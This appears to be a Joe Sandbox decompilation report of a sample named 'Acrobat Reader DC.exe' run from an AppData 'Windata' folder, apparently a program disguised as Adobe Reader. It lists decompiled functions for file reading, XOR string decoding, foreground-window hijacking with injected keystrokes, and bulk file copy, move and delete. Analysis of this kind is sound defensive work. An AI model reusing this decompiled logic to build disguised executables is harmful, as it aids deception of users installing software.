                                  • Opcode ID: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                  • Opcode Fuzzy Hash: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040F760(signed int __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4) {
                                  				char _v268;
                                  				char _v412;
                                  				char _v428;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t29;
                                  				void* _t32;
                                  				intOrPtr _t34;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t40;
                                  				intOrPtr _t42;
                                  				void* _t51;
                                  				signed int _t53;
                                  				signed int _t58;
                                  				signed int _t60;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t66;
                                  				signed int _t67;
                                  				void* _t70;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t75;
                                  
                                  				_t75 = __eflags;
                                  				_push(_t62);
                                  				_t63 = E0040F6F0(0x484ea8, __ecx | 0xffffffff, _t62);
                                  				E00413650( &_v268, _t63);
                                  				_push(_t63);
                                  				E004111DC();
                                  				_t70 = (_t67 & 0xfffffff8) - 0x1a8 + 0xc;
                                  				_t64 =  &_v412;
                                  				E0040F820( &_v412);
                                  				E0040F850( &_v268,  &_v412, _t75);
                                  				 *(__edi + 8) = 0;
                                  				_t51 = 0;
                                  				_t29 = 0;
                                  				do {
                                  					_t32 = _t29 + ( *(_t70 + _t51 + 0x18) & 0x000000ff) + ( *(_t70 + _t51 + 0x19) & 0x000000ff) + ( *(_t70 + _t51 + 0x1a) & 0x000000ff);
                                  					_t58 =  *(_t70 + _t51 + 0x1b) & 0x000000ff;
                                  					_t51 = _t51 + 4;
                                  					_t29 = _t32 + _t58;
                                  				} while (_t51 < 0x10);
                                  				 *(__edi + 8) = _t29;
                                  				_t34 = E004149C2(_a4, L"rb"); // executed
                                  				_t71 = _t70 + 8;
                                  				 *__edi = _t34;
                                  				if(_t34 == 0) {
                                  					_t35 = 1;
                                  				} else {
                                  					_t36 = E0040F5C0(__edi); // executed
                                  					_t79 = _t36;
                                  					if(_t36 == 0) {
                                  						E00414D04( &_v428, 1, 0x10,  *__edi);
                                  						_t72 = _t71 + 0x10;
                                  						E0044AFEF( &_v428, __eflags,  &_v428, 0x10, 0x99f2);
                                  						_t40 = 0;
                                  						 *(__edi + 8) = 0;
                                  						_t53 = 0;
                                  						__eflags = 0;
                                  						do {
                                  							_t60 =  *(_t72 + _t40 + 8) & 0x000000ff;
                                  							_t40 = _t40 + 1;
                                  							_t53 = _t53 * _t60;
                                  							__eflags = _t40 - 0x10;
                                  						} while (__eflags < 0);
                                  						_push( *__edi);
                                  						 *(__edi + 8) = _t53;
                                  						_t42 = E00414FE2(0, _t60, __edi, _t64, __eflags); // executed
                                  						 *((intOrPtr*)(__edi + 4)) = _t42;
                                  						_t35 = 0;
                                  					} else {
                                  						_push( *__edi);
                                  						_t66 = _t36;
                                  						E00414A46(0, _t58, __edi, _t66, _t79);
                                  						_t35 = _t66;
                                  					}
                                  				}
                                  				return _t35;
                                  			}

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3898977315-0
                                  • Opcode ID: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                  • Opcode Fuzzy Hash: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0046F3C1(void* __ecx, void* __fp0, struct HWND__* _a4, intOrPtr _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t11;
                                  				void* _t13;
                                  				void* _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  				void* _t25;
                                  				struct HWND__* _t26;
                                  				void* _t27;
                                  				struct HWND__* _t32;
                                  
                                  				_t27 = __ecx;
                                  				_t32 = _a4;
                                  				_t35 = _t32 + 0x2e0;
                                  				E004109E0(_t11, _t32 + 0x2e0);
                                  				_t25 = _t32 + 0x1b8;
                                  				_t13 = E004426BB(_t25);
                                  				_push(_t25);
                                  				if(_t13 == 0) {
                                  					_t14 = E00443833();
                                  					__eflags = _t14;
                                  					if(_t14 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t17 = E004533EB(_t25);
                                  						_t33 = _t32 + 0x1d8;
                                  						__eflags = _t32 + 0x1d8;
                                  						_t18 = E0046ED8E(_t32 + 0x1d8, __fp0, _t33, _t17, _t32 + 0x1c8, _t35,  *((intOrPtr*)(_t32 + 0x2d4)),  *(_t32 + 0x2dd) & 0x000000ff,  *(_t32 + 0x2dc) & 0x000000ff, _a8); // executed
                                  						return _t18;
                                  					}
                                  				} else {
                                  					_t26 = E0044B3AC();
                                  					_a4 = _t26;
                                  					if(IsWindow(_t26) == 0) {
                                  						L3:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E0044CDAF(_t27, _t32 + 0x1d8, _t32 + 0x1d8, _t26);
                                  						E00436299(_t35,  &_a4);
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • IsWindow.USER32(00000000), ref: 0046F3F1
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window_memmove
                                  • String ID:
                                  • API String ID: 517827167-0
                                  • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                  • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0041F677(signed int _a4, signed int _a8, long _a12) {
                                  				void* _t10;
                                  				long _t11;
                                  				long _t12;
                                  				signed int _t13;
                                  				signed int _t17;
                                  				long _t19;
                                  				long _t24;
                                  
                                  				_t17 = _a4;
                                  				if(_t17 == 0) {
                                  					L3:
                                  					_t24 = _t17 * _a8;
                                  					__eflags = _t24;
                                  					if(_t24 == 0) {
                                  						_t24 = _t24 + 1;
                                  						__eflags = _t24;
                                  					}
                                  					goto L5;
                                  					L6:
                                  					_t10 = RtlAllocateHeap( *0x496e6c, 8, _t24); // executed
                                  					__eflags = 0;
                                  					if(0 == 0) {
                                  						goto L7;
                                  					}
                                  					L14:
                                  					return _t10;
                                  					goto L15;
                                  					L7:
                                  					__eflags =  *0x496e68;
                                  					if( *0x496e68 == 0) {
                                  						_t19 = _a12;
                                  						__eflags = _t19;
                                  						if(_t19 != 0) {
                                  							 *_t19 = 0xc;
                                  						}
                                  					} else {
                                  						_t11 = E00411988(_t24);
                                  						__eflags = _t11;
                                  						if(_t11 != 0) {
                                  							L5:
                                  							_t10 = 0;
                                  							__eflags = _t24 - 0xffffffe0;
                                  							if(_t24 > 0xffffffe0) {
                                  								goto L7;
                                  							} else {
                                  								goto L6;
                                  							}
                                  						} else {
                                  							_t12 = _a12;
                                  							__eflags = _t12;
                                  							if(_t12 != 0) {
                                  								 *_t12 = 0xc;
                                  							}
                                  							_t10 = 0;
                                  						}
                                  					}
                                  					goto L14;
                                  				} else {
                                  					_t13 = 0xffffffe0;
                                  					_t27 = _t13 / _t17 - _a8;
                                  					if(_t13 / _t17 >= _a8) {
                                  						goto L3;
                                  					} else {
                                  						 *((intOrPtr*)(E00417F77(_t27))) = 0xc;
                                  						return 0;
                                  					}
                                  				}
                                  				L15:
                                  			}

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00416B5F,004115F6,?,00000000,00000000,00000000,?,00417A1B,00000001,00000214,?,004115F6), ref: 0041F6BA
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap__getptd_noexit
                                  • String ID:
                                  • API String ID: 328603210-0
                                  • Opcode ID: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction ID: b12b70d0c6160b5ee631c5b95a8e6af17588d2488de0a25e1c35044c814a7025
                                  • Opcode Fuzzy Hash: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction Fuzzy Hash: FB01B1352002159BEB249F35DC14BEB3354AB91764F15453BE815CA2B0DB788C87C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00444AF8(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t23;
                                  				void* _t28;
                                  				signed int _t29;
                                  				void* _t31;
                                  				signed short _t41;
                                  				intOrPtr* _t42;
                                  
                                  				_t42 = _a8;
                                  				_t3 =  *_t42 + 4; // 0x4
                                  				_t41 =  *( *_t42 + _a4);
                                  				 *_t42 = _t3;
                                  				_t5 = _t41 + 1; // 0x485a85
                                  				_push( ~(0 | __eflags > 0x00000000) | _t5 * 0x00000002); // executed
                                  				_t23 = E004115D7(_t41, _t42, __eflags); // executed
                                  				_t31 = _t23;
                                  				E00410E60(_t31,  *_t42 + _a4, _t41 + _t41);
                                  				_t28 = _t41 + _t41;
                                  				 *_t42 =  *_t42 + _t28;
                                  				 *((short*)(_t28 + _t31)) = 0;
                                  				_t29 = 0;
                                  				if(_t41 > 0) {
                                  					do {
                                  						 *(_t31 + _t29 * 2) =  *(_t31 + _t29 * 2) ^ _t41;
                                  						_t29 = _t29 + 1;
                                  					} while (_t29 < _t41);
                                  				}
                                  				return _t31;
                                  			}

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E004118DA(intOrPtr _a4) {
                                  				void* __ebp;
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				void* _t6;
                                  				void* _t9;
                                  
                                  				_push(0);
                                  				_push(0);
                                  				_push(_a4);
                                  				_t2 = E0041179A(_t3, _t4, _t5, _t6, _t9); // executed
                                  				return _t2;
                                  			}

                                  APIs
                                  • _doexit.LIBCMT ref: 004118E6
                                    • Part of subcall function 0041179A: __lock.LIBCMT ref: 004117A8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_doexit
                                  • String ID:
                                  • API String ID: 368792745-0
                                  • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction ID: 5a17ee954bf67223b14f28cd02c2113b96eab5bc454a4982446cab3363f3b6fe
                                  • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction Fuzzy Hash: 0DB0923258020C33DA202652AC03F563A0A87C0B64F240021BA1C1D2E1A9A2A9A58089
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E004149C2(intOrPtr _a4, intOrPtr _a8) {
                                  				void* __ebp;
                                  				void* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				void* _t6;
                                  				void* _t7;
                                  				void* _t10;
                                  
                                  				_push(0x40);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				_t3 = E00414904(_t4, _t5, _t6, _t7, _t10); // executed
                                  				return _t3;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00434418(struct HWND__* _a4) {
                                  				long _v8;
                                  				int _v12;
                                  				struct HWND__* _t13;
                                  				DWORD* _t15;
                                  				long _t20;
                                  				int _t24;
                                  				long _t39;
                                  				struct HWND__* _t45;
                                  				long _t46;
                                  				struct HWND__* _t47;
                                  
                                  				_t13 = GetForegroundWindow();
                                  				_t45 = _a4;
                                  				_t47 = _t13;
                                  				if(_t45 != _t47) {
                                  					if(_t47 == 0) {
                                  						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
                                  					}
                                  					if(IsIconic(_t45) != 0) {
                                  						ShowWindow(_t45, 9);
                                  					}
                                  					_v12 = 0;
                                  					_t15 = SetForegroundWindow(_t45);
                                  					if(_t15 != 0) {
                                  						return 2;
                                  					} else {
                                  						_t46 = GetWindowThreadProcessId(_t47, _t15);
                                  						_t39 = GetCurrentThreadId();
                                  						_t20 = GetWindowThreadProcessId(_a4, 0);
                                  						_v8 = _t20;
                                  						AttachThreadInput(_t39, _t20, 1);
                                  						AttachThreadInput(_t39, _t46, 1);
                                  						AttachThreadInput(_t46, _v8, 1);
                                  						_t24 = SetForegroundWindow(_a4);
                                  						if(_t24 != 0) {
                                  							_v12 = 3;
                                  						} else {
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
                                  							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
                                  							if(SetForegroundWindow(_a4) != 0) {
                                  								_v12 = 4;
                                  							}
                                  						}
                                  						AttachThreadInput(_t39, _v8, 0);
                                  						AttachThreadInput(_t39, _t46, 0);
                                  						AttachThreadInput(_t46, _v8, 0);
                                  						return _v12;
                                  					}
                                  				} else {
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32 ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32 ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32 ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32 ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E0044BD27(void* __edx, void* __eflags, intOrPtr _a4, short _a8, char _a12, char _a16, short _a536, short _a1064, char _a1592, struct _WIN32_FIND_DATAW _a2120, char _a2164, char _a2712, char _a3232, char _a3752) {
                                  				char _v0;
                                  				char _v1;
                                  				int _v2;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* _t61;
                                  				void* _t62;
                                  				int _t70;
                                  				void* _t79;
                                  				int _t81;
                                  				int _t85;
                                  				int _t88;
                                  				int _t95;
                                  				void* _t126;
                                  				void* _t131;
                                  				signed int _t134;
                                  				void* _t136;
                                  				void* _t137;
                                  				void* _t138;
                                  				void* _t140;
                                  
                                  				_t140 = __eflags;
                                  				E00422240(0x10b4);
                                  				_push(_t126);
                                  				_t95 = 0;
                                  				E00410120( &_a1064, _a4, __edx);
                                  				E00410120( &_a1592, _a8, __edx);
                                  				_v1 = E00433908(_t126, _t140,  &_a1064,  &_a1592);
                                  				_t61 = E00433998( &_a1064);
                                  				_t136 = (_t134 & 0xfffffff8) + 0xc;
                                  				if(_t61 != 0) {
                                  					E00411536( &_a1064, L"\\*.*");
                                  					_t136 = _t136 + 8;
                                  				}
                                  				_t62 = E00433998( &_a1592);
                                  				_t137 = _t136 + 4;
                                  				if(_t62 != 0) {
                                  					E00411536( &_a1592, L"\\*.*");
                                  					_t137 = _t137 + 8;
                                  				}
                                  				E00413A0E( &_a1064,  &_v0,  &_a2712,  &_a3752,  &_a3232);
                                  				_t138 = _t137 + 0x14;
                                  				_t131 = FindFirstFileW( &_a1064,  &_a2120);
                                  				_v2 = 1;
                                  				if(_t131 == 0xffffffff) {
                                  					L24:
                                  					FindClose(_t131);
                                  					return _t95;
                                  				} else {
                                  					while(_v2 == 1) {
                                  						if((_a2120.dwFileAttributes & 0x00000010) != 0) {
                                  							L22:
                                  							_t70 = FindNextFileW(_t131,  &_a2120);
                                  							__eflags = _t70;
                                  							if(_t70 == 0) {
                                  								_v2 = _t70;
                                  							}
                                  							continue;
                                  						} else {
                                  							E00433784(_t95,  &_a2164,  &_a3752,  &_a3232,  &_a1592,  &_a536);
                                  							E00411567( &_a8,  &_v0);
                                  							E00411536( &_a8,  &_a2712);
                                  							E00411536( &_a8,  &_a2164);
                                  							_t79 = E004339FA( &_a536);
                                  							_t138 = _t138 + 0x30;
                                  							if(_t79 == 0) {
                                  								L12:
                                  								if(_a16 != 1) {
                                  									_t81 = CopyFileW( &_a8,  &_a536, 0);
                                  									goto L18;
                                  								} else {
                                  									if(_v1 != 0) {
                                  										_t85 = CopyFileW( &_a8,  &_a536, 0);
                                  										__eflags = _t85;
                                  										if(_t85 == 0) {
                                  											goto L19;
                                  										} else {
                                  											_t81 = DeleteFileW( &_a8);
                                  											goto L18;
                                  										}
                                  									} else {
                                  										_t81 = MoveFileW( &_a8,  &_a536);
                                  										L18:
                                  										if(_t81 != 0) {
                                  											goto L21;
                                  										} else {
                                  											goto L19;
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								if(_a12 == 0) {
                                  									L19:
                                  									FindClose(_t131);
                                  									return 0;
                                  								} else {
                                  									if(lstrcmpiW( &_a8,  &_a536) == 0) {
                                  										_t88 = MoveFileW( &_a8,  &_a536);
                                  										__eflags = _t88;
                                  										if(_t88 == 0) {
                                  											goto L19;
                                  										} else {
                                  											L21:
                                  											_t95 = 1;
                                  											goto L22;
                                  										}
                                  									} else {
                                  										DeleteFileW( &_a536);
                                  										goto L12;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L25;
                                  					}
                                  					goto L24;
                                  				}
                                  				L25:
                                  			}

                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                    • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • _wcscat.LIBCMT ref: 0044BD94
                                  • _wcscat.LIBCMT ref: 0044BDBD
                                  • __wsplitpath.LIBCMT ref: 0044BDEA
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                  • _wcscpy.LIBCMT ref: 0044BE71
                                  • _wcscat.LIBCMT ref: 0044BE83
                                  • _wcscat.LIBCMT ref: 0044BE95
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                  Strings
                                  Memory Dump Source
